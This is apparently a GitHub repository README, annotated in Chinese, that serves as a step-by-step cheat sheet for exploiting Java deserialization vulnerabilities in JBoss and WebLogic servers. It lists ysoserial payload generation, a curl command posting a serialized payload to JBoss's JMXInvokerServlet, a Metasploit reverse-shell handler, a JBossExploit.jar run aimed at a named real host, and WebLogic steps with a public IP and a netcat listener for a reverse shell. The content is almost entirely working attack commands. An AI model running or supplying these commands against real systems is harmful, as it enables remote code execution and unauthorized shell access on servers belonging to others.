Skip to content

hackzx/JavaDeserialization

Repository files navigation

JavaDeserialization

###jboss:

#####一

▶ java -jar ysoserial-0.0.2-all.jar
Y SO SERIAL?  
Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'  
    Available payload types:  
        CommonsCollections1 #jboss用這個我測試過一次可行  
        CommonsCollections2 #剩下的沒測試過  
        Groovy1  
        Spring1  

▶ java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'command' >/tmp/payload
▶ curl --header 'Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue' --data-binary '@/tmp/payload' http://127.0.0.1:8080/invoker/JMXInvokerServlet

ysoserial-0.0.2-all.jar

####二

session 1:

▶ssh kali
root@Kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
msf exploit(handler) > set LHOST 123.123.123.123
msf exploit(handler) > set LPORT 999
msf exploit(handler) > exploit

session 2:

▶ssh kali
root@Kali:~# java -jar JBossExploit.jar -lhost 123.123.123.123 -lport 999 -rhost baidu.com -rport 80 -srvport 4040

JBossExploit

###weblogic:

▶ javac -classpath commons-collections-3.2.jar Main.java
▶ java Main.class
▶ python weblogic.py 116.208.2.162 7001 /tmp/payload
▶ ssh kali
root@Kali:~# nc -vv -l -p 888

Main.java的作用是生成一個從url下載jar包的payload,jar包執行反彈shell。
據說需要java1.6才可以編譯成功,eclipse黨表示未測試。

commons-collections-3.2.jar
Main.java
weblogic.py

--

更多更多的鏈接:
http://www.secpulse.com/archives/40420.html
http://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/
https://github.com/foxglovesec/JavaUnserializeExploits
https://github.com/njfox/Java-Deserialization-Exploit
http://zone.wooyun.org/content/23905

About

All in one

Resources

Stars

Watchers

Forks

Packages

 
 
 

Contributors